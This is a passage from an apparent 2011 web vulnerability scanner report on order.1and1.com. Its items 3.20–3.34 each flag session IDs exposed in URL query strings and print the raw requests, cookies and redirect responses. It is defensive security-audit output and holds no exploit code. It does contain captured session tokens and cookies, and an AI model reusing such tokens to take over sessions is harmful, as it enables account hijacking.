Location: http://order.1and1.com/xml/order/FeatureDomainDns?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.20. http://order.1and1.com/xml/order/FeatureDomainDomains  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDomainDomains

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureDomainDomains;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:39:14 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDomainDomains?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.21. http://order.1and1.com/xml/order/FeatureDomainPdr  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDomainPdr

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureDomainPdr;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:39:27 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDomainPdr?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.22. http://order.1and1.com/xml/order/FeatureDreamweaver  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDreamweaver

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureDreamweaver;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:39:03 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDreamweaver?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.23. http://order.1and1.com/xml/order/FeatureEmailEmail  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureEmailEmail

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureEmailEmail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:40:55 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureEmailEmail?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.24. http://order.1and1.com/xml/order/FeatureEmailVirusscan  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureEmailVirusscan

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureEmailVirusscan;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:41:25 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureEmailVirusscan?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.25. http://order.1and1.com/xml/order/FeatureEmailWebmail  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureEmailWebmail

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureEmailWebmail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:41:20 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureEmailWebmail?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.26. http://order.1and1.com/xml/order/FeatureFtpBackup  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureFtpBackup

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureFtpBackup;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:49:58 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureFtpBackup?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.27. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureGuaranteeMoneyback

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureGuaranteeMoneyback;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:46:18 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.28. http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrCitysearch

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureMarketingCtrCitysearch;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:44:39 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.29. http://order.1and1.com/xml/order/FeatureMarketingCtrGoogleAdWords  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrGoogleAdWords

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureMarketingCtrGoogleAdWords;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:44:28 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureMarketingCtrGoogleAdWords?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.30. http://order.1and1.com/xml/order/FeatureMarketingCtrSesub  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrSesub

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureMarketingCtrSesub;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:44:54 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureMarketingCtrSesub?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.31. http://order.1and1.com/xml/order/FeatureMarketingCtrStat  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrStat

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureMarketingCtrStat;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:45:03 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureMarketingCtrStat?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.32. http://order.1and1.com/xml/order/FeatureParallelsPlesk  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureParallelsPlesk

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureParallelsPlesk;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:48:19 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureParallelsPlesk?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.33. http://order.1and1.com/xml/order/FeatureParallelsSB  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureParallelsSB

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureParallelsSB;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:49:28 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureParallelsSB?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.34. http://order.1and1.com/xml/order/FeatureSecurityCertificate  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSecurityCertificate

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSecurityCertificate;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
